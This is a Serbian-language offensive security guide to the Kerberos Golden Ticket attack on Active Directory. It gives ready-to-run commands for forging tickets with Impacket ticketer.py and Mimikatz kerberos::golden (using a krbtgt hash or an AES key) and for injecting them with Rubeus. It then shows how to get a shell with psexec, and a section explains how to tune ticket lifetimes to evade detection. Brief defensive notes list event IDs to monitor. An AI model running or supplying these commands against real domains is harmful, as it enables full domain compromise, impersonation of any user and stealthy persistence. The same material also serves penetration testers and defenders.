Zlatna karta

Napad Zlatna karta se sastoji od kreiranja legitimnog Ticket Granting Ticket (TGT) koji se predstavlja kao bilo koji korisnik kroz upotrebu NTLM heša Active Directory (AD) krbtgt naloga. Ova tehnika je posebno korisna jer omogućava pristup bilo kojoj usluzi ili mašini unutar domena kao predstavljeni korisnik. Važno je zapamtiti da kredencijale krbtgt naloga nikada automatski ne ažuriraju.

Da biste dobili NTLM heš krbtgt naloga, mogu se koristiti različite metode. Može se izvući iz Local Security Authority Subsystem Service (LSASS) procesa ili iz NT Directory Services (NTDS.dit) fajla koji se nalazi na bilo kom Domain Controller (DC) unutar domena. Takođe, izvršavanje DCsync napada je još jedna strategija za dobijanje ovog NTLM heša, što se može uraditi pomoću alata kao što su lsadump::dcsync modul u Mimikatz-u ili secretsdump.py skripta od Impacket-a. Važno je naglasiti da za izvođenje ovih operacija obično je potrebno imati privilegije domenskog administratora ili sličan nivo pristupa.

Iako NTLM heš služi kao prihvatljiva metoda u tu svrhu, snažno se preporučuje da se lažiraju tiketi koristeći Advanced Encryption Standard (AES) Kerberos ključeve (AES128 i AES256) iz razloga operativne sigurnosti.

python ticketer.py -nthash 25b2076cda3bfd6209161a6c78a69c1c -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park stegosaurus
export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache
python psexec.py jurassic.park/stegosaurus@lab-wdc02.jurassic.park -k -no-pass

#mimikatz
kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt
.\Rubeus.exe ptt /ticket:ticket.kirbi
klist #List tickets in memory

# Example using aes key
kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /aes256:430b2fdb13cc820d73ecf123dddd4c9d76425d4c2156b89ac551efb9d591a439 /ticket:golden.kirbi

Jednom kada imate ubrizgan golden ticket, možete pristupiti zajedničkim datotekama (C$) i izvršavati usluge i WMI, tako da možete koristiti psexec ili wmiexec da biste dobili shell (izgleda da ne možete dobiti shell putem winrm).

Bypassiranje uobičajenih detekcija

Najčešći načini za otkrivanje golden ticketa su inspekcija Kerberos saobraćaja na mreži. Podrazumevano, Mimikatz potpisuje TGT na 10 godina, što će se istaknuti kao anomalija u kasnijim TGS zahtevima koji se s njim prave.

Lifetime : 3/11/2021 12:39:57 PM ; 3/9/2031 12:39:57 PM ; 3/9/2031 12:39:57 PM

Koristite parametre /startoffset, /endin i /renewmax da biste kontrolisali početni offset, trajanje i maksimalne obnove (sve u minutama).

Get-DomainPolicy | select -expand KerberosPolicy

Nažalost, vreme trajanja TGT-a nije zabeleženo u 4769, pa ove informacije nećete pronaći u Windows evidencijama događaja. Međutim, ono što možete povezati je videti 4769 bez prethodnog 4768. Nije moguće zahtevati TGS bez TGT-a, i ako nema zapisa o izdatom TGT-u, možemo zaključiti da je on lažiran offline.

Da biste zaobišli ovu detekciju, proverite dijamantske tikete:

Otklanjanje

• 4624: Prijavljivanje na nalog

• 4672: Prijavljivanje administratora

• Get-WinEvent -FilterHashtable @{Logname='Security';ID=4672} -MaxEvents 1 | Format-List –Property

Još neki trikovi koje branioci mogu primeniti su upozorenje na 4769 za osetljive korisnike, kao što je podrazumevani administratorski nalog domena.

Reference

• https://www.tarlogic.com/blog/how-to-attack-kerberos/

• [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets] (https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets)